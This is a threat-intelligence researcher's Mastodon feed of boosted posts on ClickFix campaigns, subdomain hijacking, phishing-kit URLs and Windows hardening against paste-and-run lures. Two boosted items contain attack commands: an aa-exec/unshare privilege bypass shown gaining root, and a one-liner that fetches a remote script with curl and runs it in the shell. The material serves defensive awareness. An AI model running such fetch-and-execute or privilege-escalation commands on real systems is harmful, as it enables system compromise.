Randy

Tech, banjo, guitar, outdoors
#ReverseEngineering #DFIR #ThreatIntel

Randy boosted:
2025-05-23

Our latest blog is out! It covers a rising issue that many major organization experiences: Subdomain hijacking through abandoned cloud resources.

This research follows our reporting from earlier in the year about the CDC subdomain hijack. We initially assumed that this was an isolated incident. Well… We were wrong.

We tied some of this activity to a threat actor, dubbed Hazy Hawk, who hijacks high-profile subdomains which they use to conduct large-scale scams and malware distribution.

blogs.infoblox.com/threat-inte

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #HazyHawk

a description of how hazy hawk attacks work
Randy boosted:
2025-05-14

I think I have a nice compromise #ClickFix ...fix for those places that just can't live without some Explorer niceties.

There is an alternative to the "Disable Windows shortcuts" GPO, which not only disables Win+ shortcuts, but also things like using UNC paths in the Explorer address bar.

Of course, Geoff Chappell lights the way.

I believe that GPO applies the REST_NORUN reg key and not REST_NOWINKEYS policies—despite the name.

If I apply the REST_NORUN reg setting directly, I get the same behavior as the GPO. The popup pictured here appears.

But if I instead set the REST_NOWINKEYS dialog, the Win+R shortcut is disabled, but other stuff (like UNC paths in explorer) still works! Now, this doesn't remove the Run command from the start menu, but it is at least a safety. Oh and one more thing: because that shortcut is now unregistered, you can register it yourself for something like a lil daemon that pops a message box saying Hey did a website tell you to do this? Don't!

You can try both settings.

REST_NORUN: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun

REST_NOWINKEYS: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys

UPDATE: You can additionally disable only Win+R by setting HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\Advanced\DisabledHotkeys to a String value containing the Win shortcuts you want to disable. So a single R will do the trick. Note this only works at the user level.

Windows error popup: this operation has been cancelled due to restrictions on this computer. Please contact your system administrator.
Randy boosted:
2025-04-30

So, I asked GPT to help me deofuscate this VBS script, and now I'm wondering if it's just fucking with me, or if I can never trust AI ever again.

GPT gave me a picture of an anime girl.

@deepthoughts10 @saltmyhash hey! i got that one to come up. did use salt's tip with using an Android UA. within the CSS was a comment in Chinese, so this appears to align with Kreb's article.

@deepthoughts10 actually haven't. i do see our folks going to them and have event gotten one or two myself.

looks like the URL you sent is already dead. no fun!

@threatcat_ch ah hah! sure enough, i just needed to scroll down. sheesh, sloppy code! smh

thank you for pointing that out!

@threatcat_ch hmm, i'm still seeing the mshta method

Javascript used by ClearFake

One less fake browser update campaign. Not to be left out, #SmartApeSG has switched to the #ClickFix technique.

Screenshot of a web browser showing a ClickFix dialog along with Notepad showing the malicious command placed in the paste buffer.

@crep1x i don't see a direct common artifact from the IOCs shared, but this looks just like #KongTuke

Randy boosted:
Tim (Wadhwa-)Brown :donor:timb_machine@infosec.exchange
2025-04-01

Looking at qualys.com/2025/three-bypasses:

$ aa-exec -p trinity -- unshare -U -r -m /bin/bash
# id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

(It's time to learn about namespaces =))

#linux, #threatintel

Randy boosted:
The Hacker‘s Choicethc@infosec.exchange
2025-04-01

💥CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):

“. <(curl -SsfL thc.org/7350pipe)”

@knitcode sorry to hear that. I'll think kind thoughts for you.

Randy boosted:
2025-03-28

Sophos MDR has observed two distinct social engineering campaigns using a technique referred to as ClickFix spiking during March. In both of these campaigns—one surging on March 2 and the other on March 12—the goal was deployment of SecTopRAT malware. We are tracking this activity as STAC6380. /1

Randy boosted:
2025-03-24

Tycoon 2FA (a prominent AitM phishing kit), targeting Microsoft and Google accounts, uses a new CAPTCHA page instead of the custom Cloudflare Turnstile page

e.g.
hxxps://ymi.bvyunz.]ru/3v4jfQ-cUo/
hxxps://xau.kolivax.]ru/ckYHFJN/
hxxps://ffqt.lzirleg.]es/VajlR/

Current decoy pages used since 18 March, changing every 3/4 weeks since the beginning of 2025:

urlscan.io/search/#page.title%

@dangoodin be sure to opt out of their AI training. There's no handy button. Admin must send an email request.

Randy boosted:
2025-03-19

@sekoia_io published a nice blog post about BSC (Binance Smart Chain) blog.sekoia.io/clearfakes-new-
@threatcat_ch is tracking BSC as well, and we share our gained information on Threatfox/MalwareBazaar @abuse_ch As a side note, most of the delivered payloads led to Rhadamantys (malpedia.caad.fkie.fraunhofer.) instead of Lumma in the last few days.

@briankrebs funny you should post yesterday about #ClickFix . I blogged the day prior about a supply chain attack that presented that very threat. It's been a very popular technique with the TA's, many of which have switched from fake browser updates to it. And I can state that folks do fall for it.

rmceoin.github.io/malware-anal

Randy boosted:

Stumbled into a supply chain attack yesterday affecting over 100 auto dealerships. The third party was informed and has remediated.

rmceoin.github.io/malware-anal

#ClickFix

Stumbled into a supply chain attack yesterday affecting over 100 auto dealerships. The third party was informed and has remediated.

rmceoin.github.io/malware-anal

#ClickFix

@knitcode @gentleshep FYI, there is a DGA being used by Apollo you might be interested in. It's email related, I just haven't seen the emails yet.

The format is t for subdomain, then apex domain has two words separated by a hyphen.

See this listing from @nopatience as well has this thread in general.

docs.proton.me/doc?mode=open-u

Client Info

Server: https://mastodon.social
Version: 2025.04
Repository: https://github.com/cyevgeniy/lmst